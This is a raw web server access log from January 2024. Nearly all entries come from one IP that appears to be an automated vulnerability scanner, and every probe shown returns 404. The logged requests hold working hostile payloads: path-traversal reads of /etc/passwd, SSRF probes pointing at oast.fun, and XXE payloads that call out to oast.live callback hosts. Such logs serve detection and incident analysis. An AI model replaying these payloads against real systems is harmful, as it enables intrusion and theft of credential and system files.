137.220.197.141 - - [21/Jan/2024:12:17:23 +0100] "GET /api-third-party/download/extdisks../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:17:30 +0100] "POST /servlet/UploadServlet HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:17:32 +0100] "GET /test.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:17:54 +0100] "GET /getFavicon?host=http://oast.fun/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:17:55 +0100] "POST /servlet/UploadServlet HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:17:57 +0100] "GET /test.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:18:04 +0100] "GET /getFavicon?host=http://oast.fun/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:18:05 +0100] "GET /?pum_action=tools_page_tab_system_info HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:18:06 +0100] "GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:18:06 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:18:15 +0100] "GET /getFavicon?host=http://oast.fun/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:18:20 +0100] "GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:18:27 +0100] "GET /page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:18:47 +0100] "GET /?pum_action=tools_page_tab_system_info HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:18:49 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:19:32 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:20:03 +0100] "GET /page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:20:15 +0100] "GET /page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:20:27 +0100] "GET /page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:20:48 +0100] "GET /api-third-party/download/extdisks../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:20:58 +0100] "GET /getFavicon?host=http://oast.fun/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:21:39 +0100] "GET /api-third-party/download/extdisks../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:21:41 +0100] "GET /getFavicon?host=http://oast.fun/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:22:01 +0100] "GET /getFavicon?host=http://oast.fun/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:22:03 +0100] "GET /api-third-party/download/extdisks../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:22:18 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:22:35 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:23:54 +0100] "GET /page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:24:00 +0100] "POST /admin/auth/reset-password HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:24:08 +0100] "POST /servlet/UploadServlet HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:24:10 +0100] "GET /test.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:24:48 +0100] "GET /page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:25:13 +0100] "GET /page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:25:23 +0100] "POST /admin/auth/reset-password HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:25:33 +0100] "POST /admin/auth/reset-password HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:25:38 +0100] "GET /getFavicon?host=http://oast.fun/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:25:44 +0100] "POST /admin/auth/reset-password HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:25:47 +0100] "POST /servlet/UploadServlet HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:25:49 +0100] "GET /test.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:25:55 +0100] "GET /?pum_action=tools_page_tab_system_info HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:25:57 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:26:18 +0100] "GET /api-third-party/download/extdisks../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:26:30 +0100] "POST /servlet/UploadServlet HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:26:32 +0100] "GET /test.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:27:27 +0100] "GET /getFavicon?host=http://oast.fun/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:27:39 +0100] "GET /getFavicon?host=http://oast.fun/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:27:43 +0100] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:28:26 +0100] "POST /admin/auth/reset-password HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:28:28 +0100] "GET /api-third-party/download/extdisks../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:28:41 +0100] "GET /api-third-party/download/extdisks../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:29:07 +0100] "POST /admin/auth/reset-password HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:29:19 +0100] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:29:23 +0100] "GET /page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:29:28 +0100] "POST /admin/auth/reset-password HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:29:30 +0100] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:29:38 +0100] "GET /?pum_action=tools_page_tab_system_info HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:29:40 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:29:42 +0100] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:30:02 +0100] "GET /?pum_action=tools_page_tab_system_info HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:30:04 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:31:29 +0100] "GET /page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:31:43 +0100] "GET /page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:32:51 +0100] "POST /admin/auth/reset-password HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:33:08 +0100] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:33:59 +0100] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:33:59 +0100] "POST /servlet/UploadServlet HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:34:02 +0100] "GET /test.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:34:23 +0100] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:34:46 +0100] "POST /admin/auth/reset-password HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:34:59 +0100] "POST /admin/auth/reset-password HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:35:03 +0100] "POST /boafrm/formSysCmd HTTP/1.1" 404 952
61.77.39.252 - - [21/Jan/2024:12:35:12 +0100] "POST /cgi-bin/ViewLog.asp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:36:41 +0100] "POST /boafrm/formSysCmd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:36:52 +0100] "POST /boafrm/formSysCmd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:37:05 +0100] "POST /boafrm/formSysCmd HTTP/1.1" 404 952
167.94.138.127 - - [21/Jan/2024:12:37:12 +0100] "GET / HTTP/1.1" 404 952
167.94.138.127 - - [21/Jan/2024:12:37:16 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:38:06 +0100] "POST /servlet/UploadServlet HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:38:08 +0100] "GET /test.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:38:32 +0100] "POST /servlet/UploadServlet HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:38:34 +0100] "GET /test.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:38:43 +0100] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:40:41 +0100] "POST /boafrm/formSysCmd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:40:56 +0100] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:41:04 +0100] "POST /dashboard/uploadID.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:41:10 +0100] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:41:35 +0100] "POST /boafrm/formSysCmd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:41:59 +0100] "POST /boafrm/formSysCmd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:43:02 +0100] "POST /dashboard/uploadID.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:43:17 +0100] "POST /dashboard/uploadID.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:43:34 +0100] "POST /dashboard/uploadID.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:46:25 +0100] "POST /boafrm/formSysCmd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:47:45 +0100] "POST /dashboard/uploadID.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:48:40 +0100] "POST /boafrm/formSysCmd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:48:52 +0100] "POST /dashboard/uploadID.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:48:55 +0100] "POST /boafrm/formSysCmd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:49:23 +0100] "POST /dashboard/uploadID.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:50:32 +0100] "POST /pandora_console/index.php?login=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:50:34 +0100] "POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:52:38 +0100] "GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:53:15 +0100] "POST /pandora_console/index.php?login=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:53:17 +0100] "POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:53:35 +0100] "POST /pandora_console/index.php?login=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:53:37 +0100] "POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:53:59 +0100] "POST /pandora_console/index.php?login=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:53:59 +0100] "GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:54:01 +0100] "POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:54:11 +0100] "GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:54:23 +0100] "GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:54:39 +0100] "POST /dashboard/uploadID.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:54:49 +0100] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:54:51 +0100] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:56:30 +0100] "POST /xmlpserver/ReportTemplateService.xls HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:57:18 +0100] "GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:57:29 +0100] "POST /dashboard/uploadID.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:57:33 +0100] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:57:35 +0100] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:57:47 +0100] "POST /dashboard/uploadID.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:57:54 +0100] "POST /xmlpserver/ReportTemplateService.xls HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:57:55 +0100] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:57:57 +0100] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:58:06 +0100] "GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:58:06 +0100] "POST /xmlpserver/ReportTemplateService.xls HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:58:17 +0100] "POST /xmlpserver/ReportTemplateService.xls HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:58:19 +0100] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:58:21 +0100] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:58:27 +0100] "GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:58:37 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:58:39 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:59:52 +0100] "POST /pandora_console/index.php?login=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:59:54 +0100] "POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1" 404 952
100.26.118.28 - - [21/Jan/2024:13:00:30 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:01:17 +0100] "POST /xmlpserver/ReportTemplateService.xls HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:01:26 +0100] "POST /pandora_console/index.php?login=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:01:28 +0100] "POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:02:00 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:02:02 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:02:04 +0100] "POST /xmlpserver/ReportTemplateService.xls HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:02:09 +0100] "GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:02:10 +0100] "POST /pandora_console/index.php?login=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:02:12 +0100] "POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:02:23 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:02:25 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:02:25 +0100] "POST /xmlpserver/ReportTemplateService.xls HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:02:50 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:02:52 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:04:06 +0100] "GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:04:06 +0100] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:04:09 +0100] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:04:19 +0100] "GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:05:39 +0100] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:05:41 +0100] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:06:13 +0100] "POST /xmlpserver/ReportTemplateService.xls HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:06:22 +0100] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:06:24 +0100] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:07:43 +0100] "GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//cmm00rc3m87t5g88qsog565u3aqzayia9.oast.live/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:08:08 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:08:10 +0100] "POST /_async/AsyncResponseService HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:08:12 +0100] "GET /_async/favicon.ico HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:08:12 +0100] "POST /xmlpserver/ReportTemplateService.xls HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:08:25 +0100] "POST /xmlpserver/ReportTemplateService.xls HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:09:07 +0100] "GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//cmm00rc3m87t5g88qsog38daxzmpa8xqz.oast.live/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:09:17 +0100] "GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//cmm00rc3m87t5g88qsogscnhjszrgqi7y.oast.live/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:09:29 +0100] "GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//cmm00rc3m87t5g88qsogbyjsyrqmmzgwo.oast.live/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:09:34 +0100] "POST /pandora_console/index.php?login=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:09:36 +0100] "POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:10:09 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:10:11 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:12:01 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:12:02 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:12:26 +0100] "GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//cmm00rc3m87t5g88qsogu5oouoseqsi71.oast.live/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:12:49 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:12:51 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:12:51 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:12:54 +0100] "POST /_async/AsyncResponseService HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:12:56 +0100] "GET /_async/favicon.ico HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:13:11 +0100] "GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//cmm00rc3m87t5g88qsog9w1bdwthe7hok.oast.live/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:13:23 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:13:25 +0100] "POST /_async/AsyncResponseService HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:13:27 +0100] "GET /_async/favicon.ico HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:13:27 +0100] "POST /pandora_console/index.php?login=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:13:29 +0100] "POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:13:32 +0100] "GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//cmm00rc3m87t5g88qsogp6kfc6k6ujepp.oast.live/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:13:41 +0100] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:13:43 +0100] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:13:52 +0100] "POST /pandora_console/index.php?login=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:13:54 +0100] "POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:13:59 +0100] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:14:00 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:14:02 +0100] "POST /_async/AsyncResponseService HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:14:04 +0100] "GET /_async/favicon.ico HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:15:36 +0100] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:15:47 +0100] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:16:01 +0100] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:17:15 +0100] "GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//cmm00rc3m87t5g88qsog1a79ei7pxg39g.oast.live/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:17:35 +0100] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:17:37 +0100] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:18:01 +0100] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:18:04 +0100] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:19:16 +0100] "GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//cmm00rc3m87t5g88qsogbyk7rompsfyop.oast.live/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:19:20 +0100] "POST /cgi-bin/file_transfer.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:19:29 +0100] "GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//cmm00rc3m87t5g88qsogi4xf8srctzk6k.oast.live/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:19:41 +0100] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 404 952
